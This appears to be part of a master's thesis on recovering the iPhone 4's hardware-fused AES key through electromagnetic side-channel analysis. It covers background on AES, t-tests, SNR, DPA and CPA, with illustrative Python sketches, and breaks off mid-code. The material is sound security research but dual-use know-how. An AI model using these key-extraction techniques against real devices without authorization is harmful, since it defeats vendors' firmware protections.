EM Side-channel Analysis on Smartphone Early Boot Encryption

Oleksiy Lisovets

Master’s Thesis. June 1, 2020. Chair for Security Engineering – Priv.-Doz. Dr. Amir Moradi Advisor: David Knichel

Abstract

Modern smartphones often encrypt their boot components in order to add an obstacle for attackers who want to analyse and possibly exploit the device. This gives a false sense of security, as obscurity through encryption does not protect against vulnerabilities. In this thesis the EM side-channel is used to analyse the hardware AES implementation of a smartphone and to recover the hardware-fused encryption key. To this end, a BootROM exploit is used to deploy a payload in boot loader context, which allows communicating with the hardware AES engine. Furthermore, the payload exposes a low-latency interface to the CPU by repurposing a hardware button as a GPIO output, and modifies the crypto engine invocation function such that the exposed GPIO pin signals the start and end of AES decryptions. This signal is then used as a trigger, which allows performing EM measurements for timing, SNR and correlation analysis, eventually leading to a CPA attack which recovers the hardware-fused encryption key. The recovered key allows offline decryption of current and future firmware files for the target device model.


Eidesstattliche Erklärung

Ich erkläre, dass ich keine Arbeit in gleicher oder ähnlicher Fassung bereits für eine andere Prüfung an der Ruhr-Universität Bochum oder einer anderen Hochschule eingereicht habe.

Ich versichere, dass ich diese Arbeit selbständig verfasst und keine anderen als die angegebenen Quellen benutzt habe. Die Stellen, die anderen Quellen dem Wortlaut oder dem Sinn nach entnommen sind, habe ich unter Angabe der Quellen kenntlich gemacht. Dies gilt sinngemäß auch für verwendete Zeichnungen, Skizzen, bildliche Darstellungen und dergleichen.

Ich versichere auch, dass die von mir eingereichte schriftliche Version mit der digitalen Version übereinstimmt. Ich erkläre mich damit einverstanden, dass die digitale Version dieser Arbeit zwecks Plagiatsprüfung verwendet wird.

Official Declaration

Hereby I declare that I have not submitted this thesis in this or similar form to any other examination at the Ruhr-Universität Bochum or any other institution of university.

I officially ensure that this paper has been written solely on my own. I herewith officially ensure that I have not used any other sources but those stated by me. Any and every parts of the text which constitute quotes in original wording or in its essence have been explicitly referred by me by using official marking and proper quotation. This is also valid for used drafts, pictures and similar formats.

I also officially ensure that the printed version as submitted by me fully confirms with my digital version. I agree that the digital version will be used to subject the paper to plagiarism examination.

Not this English translation but only the official version in German is legally binding.

Datum / Date Unterschrift / Signature

Contents

1 Introduction
    1.1 Motivation
    1.2 Contribution
    1.3 Related Work
    1.4 Organization of This Thesis

2 Background
    2.1 Advanced Encryption Standard
        2.1.1 AES Implementation
    2.2 Side-channel Analysis
        2.2.1 Welch’s t-test
        2.2.2 Power Consumption of ICs
        2.2.3 Power Model
        2.2.4 Signal-to-Noise Ratio
        2.2.5 Differential Power Analysis
        2.2.6 The EM Side-channel
        2.2.7 Update Formulas
    2.3 Secure Boot

3 Setup
    3.1 Target Device
    3.2 Measurement Setup
    3.3 Computations

4 Boot Loader Code Execution and AES Engine Access
    4.1 Entrypoint
        4.1.1 Preparation of Images
        4.1.2 Payload Execution
    4.2 Payload Creation
    4.3 Payload Description
        4.3.1 Payload Entrypoint
        4.3.2 Main Function
        4.3.3 AES Hook
        4.3.4 Command Handlers
        4.3.5 Helper Functions

5 AES Side-channel Analysis
    5.1 AES Engine Modes
    5.2 AES Timing
    5.3 Initial Probe Placement
    5.4 Non-Specific t-test
    5.5 Signal-to-Noise Ratio
    5.6 AES CPA Power Models
    5.7 Leaking Power Model
    5.8 Evaluating Smaller Power Models
    5.9 Full Chip Scan
    5.10 AES CPA Attack
        5.10.1 CPA With Known Key
        5.10.2 CPA on Target Key

6 Tooling
    6.1 Alignment of Traces
        6.1.1 Manual Alignment
        6.1.2 Automatic Full Chip Scan Alignment
    6.2 Efficient Correlation Implementation
        6.2.1 Server
        6.2.2 Clients
        6.2.3 OpenCL GPU Client

7 Conclusion
    7.1 Summary
    7.2 Future Work

A Acronyms

B Code

List of Figures

List of Listings

Bibliography

1 Introduction

Secure Boot is a common mechanism used in modern smartphones to prevent loading code not authorized by the vendor in the early stages of the boot process. This creates a foundation to assure the integrity of the operating system. To this end, each component in the boot process is responsible for verifying the next component before launching it, up until the kernel is booted[ios]. The root of trust is usually a small immutable piece of code which is fused into hardware, also called BootROM.

Exploiting a vulnerability in any of the components involved in the boot process lets an attacker fully compromise the system before it has even started up, thus breaking every assumption the system has about its integrity. This allows fully circumventing all mitigations which are not yet initialized at that point in time, but would have been a problem at a later stage, such as Apple's Kernel Text Readonly Region (KTRR), a mitigation which assures the immutability of the kernel, or ARMv8.3 Pointer Authentication, which is designed to prevent code reuse attacks such as Return Oriented Programming (ROP).

To hinder examination, debugging and exploitation of these boot components by unauthorized parties, vendors sometimes choose to encrypt firmware components in addition to cryptographically authenticating them. For this purpose, a key is usually fused into the hardware, which is used to decrypt individual components during the boot sequence. This layer of obscurity does not protect against boot loader vulnerabilities, but adds an obstacle for an attacker, who now first needs to break the encryption before a vulnerability can be debugged and exploited.

Physical attacks like side-channel analysis can be valuable tools to break security barriers on a level where software engineers cannot defend the system. In this thesis the applicability of Electromagnetic (EM) side-channel attacks for recovering the hardware-fused encryption keys is examined.

1.1 Motivation

For a security researcher it is beneficial to be able to analyse the code running on a device, which requires bypassing the encryption. In this thesis the EM side-channel is used to analyse the concrete Advanced Encryption Standard (AES) implementation of the Apple iPhone 4, as well as to recover the hardware-fused Group Identifier (GID) key, which allows offline decryption of boot loader components and removes the need for a physical device and a boot loader software exploit. Since such an attack requires a decryption oracle, which on its own would already be sufficient to decrypt boot loaders, the goal here is to develop a method which can use a temporary decryption oracle, obtained for example by glitching the boot loader. This establishes a permanent, unfixable primitive that allows decrypting and analysing future firmware for this device, which in turn can help to find and fix or exploit software vulnerabilities.

1.2 Contribution

This thesis evaluates the practical applicability of EM side-channel attacks on smartphones. To this end, the hardware AES is analysed using timing analysis, the t-test, Signal-to-Noise Ratio (SNR) and Correlation Power Analysis (CPA), which allows recovering the structure of the underlying implementation with high confidence. Furthermore, the position on the System on Chip (SoC) with the greatest EM leakage is determined using a systematic approach. Finally, CPA is used to recover the GID key, which is fused into the Apple iPhone 4 SoC.

1.3 Related Work

Even though many people seem interested in recovering the GID key in order to permanently be able to decrypt firmware without possessing a device and a software exploit, there is not much publicly accessible research on this topic. A compilation of available resources can be found on The iPhone Wiki[Theb]. According to an article[Intc] by The Intercept based on two documents leaked by Edward Snowden, the CIA was trying to retrieve the GID key using Differential Power Analysis (DPA)[Intb] and by physically de-processing the chip[Inta] in 2012. However, to date there is no public information on anyone extracting a GID key, and there is also no information available on whether any private attempts were successful.

The work in this thesis is most useful combined with glitching in order to achieve code execution in early boot stages. Practical applications of this were shown by Lu, who was able to get boot loader code execution on the PlayStation Vita using fault injection[Lu19]. Another practical application of glitching was shown by @derrek, @nedwill and @naehrwert[@de16] at 33C3 in 2016, who glitched the Nintendo 3DS to bypass security protections at the highest privilege level.

Schneider et al. provide a roadmap for side-channel evaluations[SM15], which can be used as a starting point when targeting a new device. Furthermore, Schneider et al. provide one-pass formulas[SMG15] for efficient parallel computation. This is especially useful for processing large amounts of data, which might be required for attacking a particular device. An alternative method for detecting side-channel leakage using the χ²-test is presented by Moradi et al.[MRSS18]. In addition, previous work by Moradi et al. evaluates practical attacks and countermeasures on reconfigurable hardware and shows that attacks are indeed possible given enough traces and resources even with countermeasures in place, making it a viable attack vector for modern smartphones[MMP11]. Furthermore, Moradi et al. demonstrate a real-world attack against the bitstream encryption of Xilinx Virtex-4 and Virtex-5 off-the-shelf FPGAs, which is supposed to protect the intellectual property and to prevent fraud through cloning or manipulating a design or even implanting hardware Trojans[MKP12].

1.4 Organization of This Thesis

This thesis first introduces the required background knowledge in Chapter 2. Next, Chapter 3 presents the setup used in this thesis, including the target device and the modifications applied to it, measurement hardware such as the oscilloscope and probe, and the computing hardware used to process the data. Afterwards, Chapter 4 explains what software needs to be executed on the target device and how to deploy it in order to create an accessible decryption oracle required for EM measurements. Chapter 5 deals with various different ways of analysing the target and what information can be gathered from each of them. Then, in Section 5.10, a CPA attack is performed in order to retrieve the hardware-fused key from the target device. The algorithms and programs used to perform data processing are discussed in Chapter 6. Finally, Chapter 7 sums up the information retrieved about the target device and gives an outlook on future work.

2 Background

This chapter provides background knowledge required to follow the side-channel analysis in this thesis.

2.1 Advanced Encryption Standard

The Advanced Encryption Standard (AES) is a symmetric cryptographic algorithm standardised by the U.S. National Institute of Standards and Technology (NIST) in 2001[DR02]. It is a subset of the Rijndael block cipher, developed by Vincent Rijmen and Joan Daemen. AES encrypts 128-bit blocks with either a 128-bit, 192-bit or 256-bit key. The algorithm consists of a key schedule, an initial AddRoundKey step and, depending on the key length, 9, 11 or 13 rounds of SubBytes, ShiftRows, MixColumns and AddRoundKey, followed by a final round that lacks the MixColumns step. The first 16 master key bytes are used as the first round key. In case of 192-bit or 256-bit AES, the subsequent bytes are used for the second round key. Using the AES key schedule, further key bytes are derived until there is a 16-byte round key for each round plus the initial AddRoundKey. The AES state is modeled by a 4×4 byte matrix which globally indexes the bytes column-wise from left to right within the matrix and locally from top to bottom within the column. Given the plaintext as byte array $p_0, p_1, \ldots, p_{15}$, the initial data state of the AES is given as:

$$
S = \begin{pmatrix}
p_0 & p_4 & p_8 & p_{12} \\
p_1 & p_5 & p_9 & p_{13} \\
p_2 & p_6 & p_{10} & p_{14} \\
p_3 & p_7 & p_{11} & p_{15}
\end{pmatrix}
$$

The AddRoundKey step xors the round key bytewise onto the AES state. Afterwards, the SubBytes step replaces each byte using a non-linear 8-bit mapping referred to as Substitution Box (S-Box). Subsequently, ShiftRows permutes the position of the bytes in the matrix such that the individual rows are rotated to the left by their row index, counting from zero. This means the first row is not rotated, the second row is rotated to the left by one byte, the third row is rotated by two bytes and the last row is rotated by three bytes. Finally, MixColumns multiplies each column of the state matrix with a fixed multiplication matrix as shown below.

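$$
\begin{pmatrix} new_0 \\ new_1 \\ new_2 \\ new_3 \end{pmatrix}
=
\begin{pmatrix}
2 & 3 & 1 & 1 \\
1 & 2 & 3 & 1 \\
1 & 1 & 2 & 3 \\
3 & 1 & 1 & 2
\end{pmatrix}
\cdot
\begin{pmatrix} old_0 \\ old_1 \\ old_2 \\ old_3 \end{pmatrix}
$$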

This multiplication is performed in the Galois field $GF(2^8)$ using the irreducible polynomial $x^8 + x^4 + x^3 + x + 1$.
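As a minimal sketch of this arithmetic, the following Python snippet multiplies bytes in $GF(2^8)$ modulo $x^8 + x^4 + x^3 + x + 1$ and applies the standard MixColumns matrix to a single state column. The function names `xtime`, `gf_mul` and `mix_column` are illustrative choices and are not taken from the thesis code.

```python
# Reduction polynomial x^8 + x^4 + x^3 + x + 1, written as a bit mask.
AES_POLY = 0x11B

# Standard MixColumns matrix (one row per output byte).
MIX_MATRIX = [
    [2, 3, 1, 1],
    [1, 2, 3, 1],
    [1, 1, 2, 3],
    [3, 1, 1, 2],
]


def xtime(a):
    """Multiply a byte by x (i.e. by 2) in GF(2^8)."""
    a <<= 1
    if a & 0x100:          # degree 8 reached: reduce modulo the AES polynomial
        a ^= AES_POLY
    return a & 0xFF


def gf_mul(a, b):
    """Multiply two bytes in GF(2^8) using shift-and-add."""
    result = 0
    while b:
        if b & 1:          # add (xor) the current multiple of a
            result ^= a
        a = xtime(a)
        b >>= 1
    return result


def mix_column(column):
    """Apply MixColumns to one 4-byte column of the state."""
    out = []
    for row in MIX_MATRIX:
        acc = 0
        for coeff, byte in zip(row, column):
            acc ^= gf_mul(coeff, byte)   # addition in GF(2^8) is xor
        out.append(acc)
    return out


mixed = mix_column([0xDB, 0x13, 0x53, 0x45])
```

A hardware implementation would typically realize the constant multiplications as fixed xor networks rather than a loop; the loop form is used here only for readability.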

2.1.1 AES Implementation

AES can be implemented in many different ways depending on the available resources and optimization goals. A few common implementations are described in the following.

2.1.1.1 Round Based

The most straightforward approach is the round-based implementation, where each step described in Section 2.1 is implemented in a single circuit which is re-used in every round. An implementation in hardware usually follows one of two approaches. In the first, a register is placed after every step, which minimizes the critical path and allows a higher clock speed at the cost of additional hardware (registers). In the second, a full round is computed in one clock cycle before the state is saved in a register. This slightly reduces the maximum possible clock speed due to a longer critical path, but requires fewer registers.

2.1.1.2 T-Table

Another way of implementing AES is using T-Tables as described by the authors Daemen and Rijmen[DR02], which technically is also a round-based implementation. The idea is to create four 1-to-4 byte lookup tables which combine SubBytes, ShiftRows and MixColumns such that one column of a round can be written as:

$$
\begin{pmatrix} s'_{4i+0} \\ s'_{4i+1} \\ s'_{4i+2} \\ s'_{4i+3} \end{pmatrix}
= T_0[s_{4i}] + T_1[s_{4(i+1)+1}] + T_2[s_{4(i+2)+2}] + T_3[s_{4(i+3)+3}] + K_r[i]
$$

Here $s$ denotes the old and $s'$ the new state, $T_i$ is the $i$-th T-Table and $K_r$ is an array indexing 4 key bytes of the $r$-th round at a time. The $+$ denotes a bitwise xor of 32-bit words. Furthermore, all indices into $s$ are taken modulo 16, which was omitted in the formula for the sake of readability. This implementation is used when high performance is desired and large amounts of memory or physical space (in case of a hardware implementation) are not an issue. One round needs 16 table lookups and 16 32-bit xor operations, but requires $4 \cdot 4 \cdot 256 = 4096$ bytes of memory for the T-Tables.

2.1.1.3 Fully Unrolled

Having a fully unrolled hardware implementation of AES means that there is a dedicated circuit for each step in every round. This allows performing a full encryption in one single clock cycle, but has several disadvantages.

One disadvantage is that, due to a very long critical path, the clock speed needs to be low. Another is that a fully unrolled implementation consumes a lot of physical area on the chip. Furthermore, such an implementation is not very flexible, meaning it is not possible to switch between 128-bit, 192-bit and 256-bit key sizes (due to the different numbers of rounds) or between encryption and decryption modes. It is possible to overcome the low clock speed issue by placing a register after every round. This allows a high throughput if a lot of data needs to be encrypted with the same key, as this pipeline computes one encrypted block in every clock cycle after an initial latency equal to the number of clock cycles required for one full encryption.

2.2 Side-channel Analysis

The AES cipher is considered cryptographically secure, meaning there is currently no known practical attack that breaks its mathematical properties in order to extract the key, even with an encryption/decryption oracle available. Individual implementations, on the other hand, can be vulnerable to attacks even when the mathematical properties of a cipher are secure. Physical attacks exploit physical properties of a device and can be divided into several categories, as seen in Figure 2.1. This thesis focuses on passive non-invasive attacks, or more specifically: side-channel attacks.

                 Passive                 Active
Invasive         Probing                 Forcing Permanent Faults
Semi-Invasive    Optical Inspection      Light/Radiation Attacks
Non-Invasive     Side-channel Attacks    Clock/Power/Temperature Glitching Attacks

Figure 2.1: Overview of Physical attacks

When a device is inspected while it processes data, e.g. during an encryption, an attacker may observe physical properties like the runtime of the particular implementation, the power consumption or EM emanations of the device during runtime, or even the produced heat. These properties directly correlate with the processes on the device and can leak information about the internal state while the algorithm is executing. They are thus referred to as ‘side-channels’.

If, for example, the runtime of an operation depends on a secret value, it might be possible to measure the time to gain information about that value. This is called a timing side-channel attack.

Another example is that when a value in memory is replaced with a different value, the electrical circuit only needs to change its state if the new value differs from the old value. For example, if a 1 in memory is replaced with a 0 (or vice versa), more power is consumed compared to the case where a 1 is replaced with a 1 (or a 0 with a 0). By measuring the power it might be possible to learn whether the value changed. This is called a power side-channel attack. The same principle applies to electromagnetic emanations, which directly correlate with the power consumption. When exploiting an EM side-channel, the electromagnetic emanations are measured rather than the power consumption.

Because the measured power consumption or electromagnetic emanation is influenced not only by informative data, called signal, but also by the environment and other unrelated processes, called noise, several statistical tools are used to filter out the noise and extract the signal from the measurements. The amount of useful signal that can be extracted highly depends on the implementation and the presence or absence of countermeasures.

One countermeasure is hiding, which tries to decrease the SNR. This can be achieved by adding unrelated circuits processing random data, which increases the noise. Another countermeasure is masking, which attempts to hide leakage in higher statistical orders. The secret is split into multiple shares by xoring it with a random value. For example, let $x$ be the secret and $r$ a random value. Then, one share is $x_1 = x \oplus r$ and the other is $x_2 = r$. Now both $x_1$ and $x_2$ are random values that, on their own, are independent of the secret $x$. The idea is to process both shares individually and combine them afterwards. For example, if $f(\cdot)$ is a linear function, then $f(x) = f(x_1 \oplus x_2) = f(x_1) \oplus f(x_2)$, and therefore the shares can be processed individually.
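The share splitting described above can be illustrated with a short Python sketch. It assumes a single secret byte and uses an 8-bit rotation as an example of a function that is linear with respect to xor; the names `split_into_shares` and `rotl8` are hypothetical and chosen only for this illustration.

```python
import secrets


def split_into_shares(x):
    """Split a secret byte x into two Boolean shares (x ^ r, r)."""
    r = secrets.randbits(8)      # fresh random mask for every execution
    return x ^ r, r


def rotl8(value, amount):
    """Rotate a byte to the left; rotation is linear with respect to xor."""
    amount %= 8
    return ((value << amount) | (value >> (8 - amount))) & 0xFF


secret = 0xA7
share1, share2 = split_into_shares(secret)

# Each share is processed on its own; the secret itself is never recombined
# before the linear function has been applied.
result = rotl8(share1, 3) ^ rotl8(share2, 3)
```

Non-linear operations such as the AES S-Box do not distribute over xor in this way, which is why masking them requires additional care beyond this sketch.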

2.2.1 Welch’s t-test

Welch’s t-test is a statistical hypothesis test which quantifies the evidence that the means of two normally distributed sets differ from each other[Wel47]. Using the t-test it is possible to examine the validity of the null hypothesis, which states that two sets are drawn from normally distributed populations with the same mean and are thus not distinguishable by the mean. The value $t$ is computed using the formula:

$$
t = \frac{\mu_0 - \mu_1}{\sqrt{\frac{\sigma_0^2}{n_0} + \frac{\sigma_1^2}{n_1}}}
\quad\text{where}\quad
\sigma^2 = \frac{1}{n}\sum_{i=1}^{n}(x_i - \mu)^2
\quad\text{and}\quad
\mu = \frac{1}{n}\sum_{i=1}^{n} x_i
$$

for two sets $Q_0$ and $Q_1$ with cardinalities $n_0$ and $n_1$, means $\mu_0$ and $\mu_1$, and variances $\sigma_0^2$ and $\sigma_1^2$ (where all values are equally likely), respectively. In practical applications such as side-channel attacks, where both populations are large enough, a threshold of $|t| > 4.5$ is defined to reject the null hypothesis, as it leads to a confidence of >0.99999[SM15].

The Non-Specific t-test can be used for assessing leakage of a device in order to determine whether it might be exploitable. The idea is to measure the power consumption or EM emanation of two sets of encryptions, one with a fixed input and one where each measurement is done with a randomly varied input. Because all intermediate values in the encryption are always the same for the same input, the power consumption should be similar when no countermeasures are implemented.

If the t-test rejects the null hypothesis, then it is possible to distinguish the fixed input encryptions from random input encryptions solely by their power traces. That in turn means there is leakage which can possibly be exploited in order to recover the secret. A special measurement phase is needed, where the decision on encrypting a fixed or random input is based on a random coin toss. This is required because otherwise there might be dependencies not related to exploitable leakage, causing false positives in the t-test. If it is not possible to reject the null hypothesis using the first-order t-test, higher-order testing can help detect leakage in case countermeasures like masking are implemented. However, higher-order attacks are out of the scope of this thesis.
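A minimal Python sketch of the first-order t-test follows. It assumes traces are plain lists of samples of equal length and uses the variance with factor 1/n, as in the formula of this section. The function names and the constant `THRESHOLD` are illustrative and not taken from the thesis tooling.

```python
import math

THRESHOLD = 4.5  # |t| above this value rejects the null hypothesis


def mean_and_variance(samples):
    """Return mean and variance (factor 1/n) of a sequence of samples."""
    n = len(samples)
    mu = sum(samples) / n
    var = sum((x - mu) ** 2 for x in samples) / n
    return mu, var


def welch_t(q0, q1):
    """Welch's t statistic for two sample sets."""
    mu0, var0 = mean_and_variance(q0)
    mu1, var1 = mean_and_variance(q1)
    # Note: raises ZeroDivisionError if both sets have zero variance.
    return (mu0 - mu1) / math.sqrt(var0 / len(q0) + var1 / len(q1))


def t_trace(fixed_traces, random_traces):
    """Compute t independently for every point in time."""
    fixed_columns = zip(*fixed_traces)      # samples of one time point
    random_columns = zip(*random_traces)
    return [welch_t(f, r) for f, r in zip(fixed_columns, random_columns)]


def leaking_points(t_values):
    """Indices of time points where the null hypothesis is rejected."""
    return [i for i, t in enumerate(t_values) if abs(t) > THRESHOLD]


fixed = [[1.0, 10.0], [2.0, 10.5], [3.0, 9.5], [4.0, 10.0]]
rand = [[2.0, 10.0], [3.0, 9.5], [4.0, 10.5], [5.0, 10.0]]
t_values = t_trace(fixed, rand)
```

With only four toy traces per set, no point exceeds the threshold; real evaluations use far larger trace sets, for which the one-pass formulas of Section 2.2.7 become relevant.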

2.2.2 Power Consumption of ICs

The power consumption of an Integrated Circuit (IC) can be divided into several components, not all of which are interesting for the attacker. The total power consumption consists of the power the device consumes when idle ($P_{const}$) plus the power which depends on the instruction the IC executes or the data it processes ($P_{var}$). The majority of today’s hardware is built using Complementary Metal-Oxide-Semiconductor (CMOS) technology, which consists of a pull-up network, connecting the output with power ($V_{dd}$), and a pull-down network, connecting the output with ground ($V_{ss}$). An example of a CMOS inverter is shown in Figure 2.2.

Figure 2.2: CMOS inverter[Wika]

When the circuit is in a stable state it consumes very little power. Even then, however, there is a difference in power consumption between different states. For example, if the input is low, the inverter connects $V_{out}$ to $V_{dd}$. Since the transistors do not block perfectly, there is a small leakage current between $V_{dd}$ and $V_{ss}$. This issue becomes more relevant the smaller the technology becomes. Furthermore, whatever is connected to $V_{out}$ will draw a little energy from $V_{dd}$ (when $V_{in}$ is low), thus creating a very small current. This consumes more power than the case where $V_{out}$ is connected to $V_{ss}$.

When the inverter changes its state, there is dynamic power consumption. For example, when $V_{out}$ changes from low to high, the circuit needs to be charged. This consumes more power than when $V_{out}$ changes from high to low, in which case the circuit needs to be discharged. Another important effect is the short-circuit current: a short circuit between $V_{dd}$ and $V_{ss}$ is created because both transistors are conductive for a short period of time when the input signal switches.

The overall power consumption can be modeled as $P_{total} = P_{const} + P_{const\_expl} + P_{var\_expl} + P_{noise}$. Using a statistical approach it is possible to overcome $P_{const}$ and $P_{noise}$, where the latter is usually modeled as Gaussian noise, in order to extract the exploitable part.

2.2.2.1 Glitches

Glitches are unnecessary signal transitions without functionality, which occur when a circuit changes its state. When all inputs change at the same time (e.g. on a rising clock edge), some signals arrive later at certain gates than others due to a longer physical path or more gates that need to be passed. Figure 2.3 shows a circuit consisting of two logic gates, namely an or gate and an and gate.

Figure 2.3: Logic gates[Wikb]

When, for example, the inputs ($A = 1$, $B = 0$, $C = 0$) change to ($A = 0$, $B = 0$, $C = 1$), the signal $C = 1$ arrives at the and gate before $A \lor B$ holds the correct value. Thus, for a short period, the and gate sees the values $A \lor B = 1$ and $C = 1$, which causes the output $O$ to be 1 for some time before it holds the correct value 0. Since the output was 0 in the previous clock cycle and is again 0 in the current clock cycle, the temporary transition to 1 was unnecessary. The longer the critical path is, the more unnecessary transitions there are in a circuit before the output holds a stable value. This has no effect on the correct functioning of the circuit, since the clock cycle is always long enough to let the signals propagate correctly before the output is used in the next cycle. However, it causes the power consumption to be much higher in a clock cycle where inputs change compared to a clock cycle where the inputs stay the same. Glitch power dissipation is 20%-70% of total power dissipation and thus should be considered for side-channel attacks.
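The glitch in this example can be reproduced with a small Python sketch. It assumes that the circuit of Figure 2.3 computes O = (A or B) and C, and that C reaches the and gate one gate delay earlier than the output of the or gate; both the function name `simulate_transition` and this simplified timing model are assumptions made for illustration.

```python
def simulate_transition(old_inputs, new_inputs):
    """Return the and-gate output before, during and after an input change."""
    a0, b0, c0 = old_inputs
    a1, b1, c1 = new_inputs
    before = (a0 | b0) & c0
    # Assumption: the new C is already visible while the or gate still
    # outputs the value computed from the old A and B.
    during = (a0 | b0) & c1
    after = (a1 | b1) & c1
    return [before, during, after]


outputs = simulate_transition((1, 0, 0), (0, 0, 1))

# Count output transitions; every transition (dis-)charges the output node.
transitions = sum(x != y for x, y in zip(outputs, outputs[1:]))
```

Although the stable output is 0 both before and after the input change, the output node toggles twice, which is the additional dynamic power consumption attributed to glitches.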

2.2.3 Power Model

When attacking an IC using power side-channels, the exploitable power consumption is often modeled using a so-called power model to recover the IC's internal values from measurements of the power consumption during runtime. Given data stored in a register, two possible power models can be applied. The first one models the static power consumption, i.e. if the register stores a 1 it will consume more power compared to when it stores a 0 (or vice versa in case of an active-low circuit). The other one models the power consumption on state transition, i.e. the moment the register gets updated with a new value. If the old value matches the new value, less power is consumed for transitioning between the states, compared to the case where the values are different. This is because of the high number of glitches, where the circuit needs to be (dis-)charged several times. In order to recover a one-byte value from a register using power traces, a hypothetical power consumption is created for each value and compared to the real trace. The hypothetical power consumption closest to the real trace is most likely the one yielding the correct internal value. Applying this to the previously given example, the power model would be either the Hamming weight of the value or the Hamming distance between the old and the new value.
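Both power models are simple to state in code. The following Python sketch uses illustrative function names and assumes non-negative integer register values.

```python
def hamming_weight(value):
    """Number of set bits; models the static consumption of a stored value."""
    return bin(value).count("1")


def hamming_distance(old_value, new_value):
    """Number of flipped bits; models the consumption of a register update."""
    return hamming_weight(old_value ^ new_value)


# Hypothetical consumption for every possible byte stored in a register.
hw_model = [hamming_weight(v) for v in range(256)]

# Hypothetical consumption when a register holding 0x0F is overwritten.
hd_model = [hamming_distance(0x0F, v) for v in range(256)]
```

An 8-bit Hamming weight takes one of nine values (0 to 8), which is why such a model partitions traces into nine groups.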

2.2.4 Signal-to-Noise Ratio

The Signal-to-Noise Ratio (SNR) provides a way to find the points in time where Pexp is largest and thus most promising for an attack. The general definition is

$$
SNR = \frac{Var(Signal)}{Var(Noise)},
$$

which in the given context translates to

$$
SNR = \frac{Var(P_{exp})}{Var(P_{noise})}
$$

When attacking an implementation, the SNR can be used to determine how much and at what point in time a specific power model (see Section 2.2.3) leaks. To this end, the traces are separated into groups based on the power model. If, for example, the 8-bit Hamming weight of the first plaintext byte is used as a power model, the traces are divided into 9 groups according to that model. Then, the SNR at each point in time of the trace is computed as

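$$
SNR = \frac{\sigma^2_{means}}{\mu_{variances}}
\quad\text{with}\quad
\mu_{variances} = \frac{1}{n_{groups}} \sum_{i=1}^{n_{groups}} \sigma^2_{g_i}
\quad\text{and}
$$

$$
\sigma^2_{means} = \frac{1}{n_{groups}} \sum_{i=1}^{n_{groups}} (\mu_{g_i} - \mu_{means})^2
\quad\text{while}\quad
\mu_{means} = \frac{1}{n_{groups}} \sum_{i=1}^{n_{groups}} \mu_{g_i}
$$

Here $\mu_{g_i}$ and $\sigma^2_{g_i}$ are the mean and variance of group $i$, respectively, at a single point in time over all traces.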
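The SNR estimate can be sketched in Python for a single point in time as follows. The function name `snr_at_point` and the representation of the power model as one integer label per trace are assumptions made for this illustration; for a full trace the function would be applied to every sample index.

```python
from collections import defaultdict


def snr_at_point(samples, labels):
    """Estimate the SNR at one point in time.

    samples: one measured value per trace at this point in time
    labels:  the power model value of each trace (e.g. a Hamming weight)
    """
    groups = defaultdict(list)
    for sample, label in zip(samples, labels):
        groups[label].append(sample)

    group_means = []
    group_variances = []
    for values in groups.values():
        mu = sum(values) / len(values)
        group_means.append(mu)
        group_variances.append(sum((x - mu) ** 2 for x in values) / len(values))

    n_groups = len(groups)
    mu_means = sum(group_means) / n_groups
    var_means = sum((m - mu_means) ** 2 for m in group_means) / n_groups
    mu_variances = sum(group_variances) / n_groups
    # Note: a noiseless signal (mu_variances == 0) would divide by zero.
    return var_means / mu_variances


example_snr = snr_at_point([1.0, 3.0, 5.0, 7.0], [0, 0, 1, 1])
```

In the toy example the two group means (2 and 6) have variance 4 while each group has variance 1, so the estimate is 4.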

2.2.5 Differential Power Analysis

Differential Power Analysis (DPA), published by Kocher et al. in 1999, is a statistical approach to exploit the data-dependent part of the power consumption[KJJ99]. The idea of the attack is to analyse the power consumption at a fixed moment in time for different inputs. Each point in time is considered independently, which allows recovering not only the secret, but also the point in time at which an intermediate value is processed on the device. Similar to evaluating the SNR, a power model is required to perform a DPA attack. Depending on this model, only a small subset of the key space is considered at a time. The key is usually recovered either bytewise or in small groups of 2 or 4 bytes at once.

2.2.5.1 Classical Differential Power Analysis

In classical DPA, traces are divided into groups based on a power model and key candidate. Then, the mean is computed for each point in time on the trace for each of those groups. The general idea is that for an incorrect key candidate the traces are grouped randomly such that the means in the individual groups are similar, resulting in a low variance of means. If an accurate power model is selected, the right key guess will lead to a sorting with distinguishable means. For example, when using the Hamming weight as power model, traces where a value with higher Hamming weight is processed are expected to consume more power than traces where a value with lower Hamming weight is processed. This will be reflected by the mean power consumption of the groups if the traces are grouped correctly. In that case the variance of means is higher than the variance of means of randomly grouped traces.

2.2.5.2 Correlation Power Analysis

A more recent variant is Correlation Power Analysis (CPA), which uses hypothetical power consumptions rather than splitting up the traces into groups. For each key guess, a hypothetical power consumption is created for each trace, which is then correlated with the real power consumption. Again, the idea is that the correct key candidate yields a hypothetical power consumption which correlates much better than those generated from wrong candidates. To this end, the Pearson correlation coefficient is used, which measures the linear dependency between two random variables and yields a value between $-1$ and $1$[BCHC09]. It is computed by dividing the covariance of two sets by the product of their standard deviations:

$$
\rho = \frac{cov(X, Y)}{\sigma_X \sigma_Y}
= \frac{\sum_{i=1}^{n} (X_i - \bar{X})(Y_i - \bar{Y})}{\sqrt{\sum_{i=1}^{n} (X_i - \bar{X})^2}\,\sqrt{\sum_{i=1}^{n} (Y_i - \bar{Y})^2}}
$$

For the attack, a key candidate with high absolute correlation is an indicator for a correct guess, while a correlation value close to zero suggests an incorrect guess.
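The following Python sketch runs a CPA on simulated data to show the mechanics. It is a toy setup and not the attack on the target device: it assumes a 4-bit key, uses the 4-bit PRESENT S-box as a small stand-in for the AES S-Box, and simulates each measurement as the Hamming weight of the S-box output plus Gaussian noise. All function names and parameters are hypothetical.

```python
import math
import random

# 4-bit PRESENT S-box, used only as a compact stand-in for the AES S-Box.
SBOX = [0xC, 0x5, 0x6, 0xB, 0x9, 0x0, 0xA, 0xD,
        0x3, 0xE, 0xF, 0x8, 0x4, 0x7, 0x1, 0x2]


def hamming_weight(value):
    return bin(value).count("1")


def pearson(xs, ys):
    """Pearson correlation coefficient of two equally long sequences."""
    n = len(xs)
    mean_x = sum(xs) / n
    mean_y = sum(ys) / n
    cov = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    dev_x = math.sqrt(sum((x - mean_x) ** 2 for x in xs))
    dev_y = math.sqrt(sum((y - mean_y) ** 2 for y in ys))
    return cov / (dev_x * dev_y)


def simulate_measurements(key, n_traces, noise_sigma, seed):
    """Simulated leakage: HW(SBOX[p ^ key]) plus Gaussian noise."""
    rng = random.Random(seed)
    plaintexts = [i % 16 for i in range(n_traces)]
    samples = [hamming_weight(SBOX[p ^ key]) + rng.gauss(0.0, noise_sigma)
               for p in plaintexts]
    return plaintexts, samples


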